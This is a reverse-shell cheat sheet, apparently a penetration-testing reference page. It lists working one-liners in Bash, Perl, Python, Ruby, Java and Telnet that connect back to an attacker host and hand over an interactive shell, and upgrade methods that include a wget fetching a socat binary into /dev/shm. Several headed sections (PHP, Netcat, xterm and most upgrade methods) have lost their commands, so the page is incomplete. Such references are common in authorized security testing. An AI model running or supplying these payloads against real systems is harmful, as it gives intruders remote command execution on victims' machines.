Reverse Shell OneLiners
Spawn, catch & upgrade reverse shells
Reverse Shells
Bash
Alternatives for Bash shell:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Shorter Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
If the target system is running Windows use the following one-liner:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Longer Ruby reverse shell that does not depend on /bin/sh:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
If the target system is running Windows use the following one-liner:
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Netcat
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
Other nc alternatives:
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Telnet
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp
xterm
The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
Or:To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
You’ll need to authorise the target to connect to you (command also run on your host):
Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
Shell Upgrades
Method 1: Python pty module
Method 2: Using socat
On attack machine (listen):
On Victim (launch):
Method 3: Upgrading from netcat with magic
In reverse shell:
On attack machine:
In reverse shell:
Method 4: Using script
Method 5: Using Other Scripting Languages
Perl:
Ruby:
Lua:
Method 6: Using socat one-liner
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444
Method 7: Using Expect
Create a script called sh.exp:
Then, execute this script on the victim machine.
Method 8: Using rlwrap
—
References
1. Reverse Shell Cheat Sheet | pentestmonkey. (n.d.). https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
2. Reverse shells one-liners. (n.d.). https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html?m=1
3. ropnop blog. https:// blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
4. zweilosec. https://zweilosec.github.io/posts/upgrade-linux-shell/
5. 0xffsec. https://0xffsec.com/handbook/shells/full-tty/